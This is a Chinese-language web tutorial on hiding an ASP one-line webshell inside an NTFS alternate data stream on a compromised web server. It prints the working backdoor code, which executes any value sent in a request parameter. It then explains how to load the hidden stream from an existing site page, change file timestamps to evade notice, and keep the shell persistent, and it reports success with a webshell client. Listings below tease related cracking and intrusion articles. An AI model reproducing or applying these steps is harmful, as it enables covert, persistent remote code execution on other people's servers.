驱动管家:安全、高效、精准的专业驱动下载站!

怎么隐藏一句话木马?利用ntfs流隐藏你的一句话木马

2018-01-19 12:30:40责编:llp   来源:驱动管家     人气:

这是利用NTFS流隐藏你的一句话小马,这方法,文件写入后,不容易给发现,隐藏性好!

如下是ASP脚本的例子!

NTFS流文件的内容如下

<%

re= request("test")

if re <>"" then

execute re

response.end '表示结束,不再处理别的代码

end if

%>

把内容写入如下位置(示例位置)

H:\Web\动易\Inc:1.jpg

怎么隐藏一句话木马?利用ntfs流隐藏你的一句话木马

看清楚,是:1.jpg不是\1.jpg

文件写入后,H:\Web\动易\Inc目录里是看不到文件的!

现在要引导这个一句话文件!格式: 404-驱动狗

我随便选一个文件(最好不要自己新建文件,别人容易发现有新文件)

H:\Web\动易\Announce.asp

怎么隐藏一句话木马?利用ntfs流隐藏你的一句话木马

添加

怎么隐藏一句话木马?利用ntfs流隐藏你的一句话木马

修改后保存!

一句话木马隐藏基本完成!当然 H:\Web\动易\Announce.asp 你可以改个一下修改的时间,

这样别人就不容易发现有问题!

还有说一下,2003的流,是可以写入文件也可以写入目录的!你想把一句话马写在目录里也成,文件里也成

但建议保存到目录里,因为文件如果修改,流数据将会清空,但目录不会!

用菜刀测试成功!

怎么隐藏一句话木马?利用ntfs流隐藏你的一句话木马

  • 网络安全密钥 怎么获取密钥生成算法?

    网络安全密钥 怎么获取密钥生成算法?

    从拷贝保护产品中剥取(ripping)算法通常是创建密钥生成程序的一种简单而行之有效的方法。其思路非常简单:定位受保护程序内计算合法序列号的函数(可能不止一个函数),并将它(们)移植到你密钥生成程序中。这

    详情2018-01-13 17:21:44责编:llp   来源:驱动管家     
  • 2016年木马病毒查杀软件的排行榜

    2016年木马病毒查杀软件的排行榜

    现在的电脑杀毒软件种类很多,在选择的时候,很多人并不知道如何去进行选,按照什么标准来进行选择,其实在选择杀毒软件首先要看杀毒能力,其次可以根据杀毒软件的功能来进行判定排名,下面就和大家一起来分析一

    详情2018-01-05 13:58:41责编:llp   来源:驱动管家     
  • 验证码识别的原理是什么?验证码识别怎么破解?

    验证码识别的原理是什么?验证码识别怎么破解?

    对于比较复杂的验证码,比如DZ论坛最新的验证码,处理起来相对麻烦一些,但是原理还是和普通的识别一样的,无非多了个背景处理的方案,看如下对DZ论坛的验证码的识别的思路首先我们要去除它的背景,对于这样稍微

    详情2018-01-03 13:52:23责编:llp   来源:驱动管家     
  • 科迅会员上传webshell漏洞?文件webshell漏洞怎么修复?

    科迅会员上传webshell漏洞?文件webshell漏洞怎么修复?

    会员上传文件漏洞,可以上传任意后缀user swfupload asp文件漏洞复制代码代码如下:If UpFileObj Form( "NoReName ")= "1 " Then & 39;不更名Dim PhysicalPath,FsoObj:Set FsoObj = KS InitialObject(KS Settin

    详情2018-01-11 14:54:27责编:llp   来源:驱动管家     
  • flash动画不能正常播放怎么破解?反编译flash怎么做?

    flash动画不能正常播放怎么破解?反编译flash怎么做?

    我记得san以前学英语的时候搞过一批新东方的flash,于是找到他当时写的文档看了一下。这才知道,原来flash也是可以反编译的。

    详情2018-01-11 14:03:35责编:llp   来源:驱动管家     
  • 织梦cms网站出现漏洞 dedecms 5.5程序泄露网站路径信息

    织梦cms网站出现漏洞 dedecms 5.5程序泄露网站路径信息

    首发:红科网安作者:Amxking漏洞程序:dedecms5 5测试对象:织梦网CMS官方网站提交时间:2010-03-17漏洞类型:信息泄露危险等级:低漏洞描述:dedecms 5 5程序泄露网站路径信息。 测试地址:http: www dedecm

    详情2018-01-16 18:09:54责编:llp   来源:驱动管家     
  • 怎么保护dns服务器?dns服务器的十种保护方法

    怎么保护dns服务器?dns服务器的十种保护方法

    本文收集总结了几点保护DNS服务器的有效方法,感兴趣的小伙伴们可以参考一下。

    详情2018-01-04 17:09:39责编:llp   来源:驱动管家     
  • 脱壳教程 jdpack如何脱壳?

    脱壳教程 jdpack如何脱壳?

    这是一个加壳软件,软件加壳后可以检测trw及sice,它的1 00版检测到trw或sice时只是提示,到了1 01版,检测到就会出现非法操作 未注册版好像没有时间限制,但是给软件加壳后每次运行就会提示 "Unregistered JDPack Thi

    详情2018-01-19 09:35:00责编:llp   来源:驱动管家     
  • 黑客入侵无线网络的方法是什么?

    黑客入侵无线网络的方法是什么?

    现在无线宽频上网越来越流行,但许多无线网络并没有采取安全防护措施,不但易遭黑客入侵,而且事后追查凶手都很困难。专家提醒,黑客入侵无线网络通常采用以下四种手段:方法一:现成的开放网络过程:黑客扫瞄所有开

    详情2018-01-04 13:50:16责编:llp   来源:驱动管家     
  • extmail软件有哪些安全漏洞?extmail软件安全漏洞集锦

    extmail软件有哪些安全漏洞?extmail软件安全漏洞集锦

    漏洞说明:ExtMail Project 是一个活跃的开源邮件系统项目,目前由ExtMail 团队维护。该项于2005年9月18日正式启动,最初以WebMail软件为主,至今已逐步形成了ExtMail软件系列。整个项目的目标是开发出高效、

    详情2018-01-11 15:56:02责编:llp   来源:驱动管家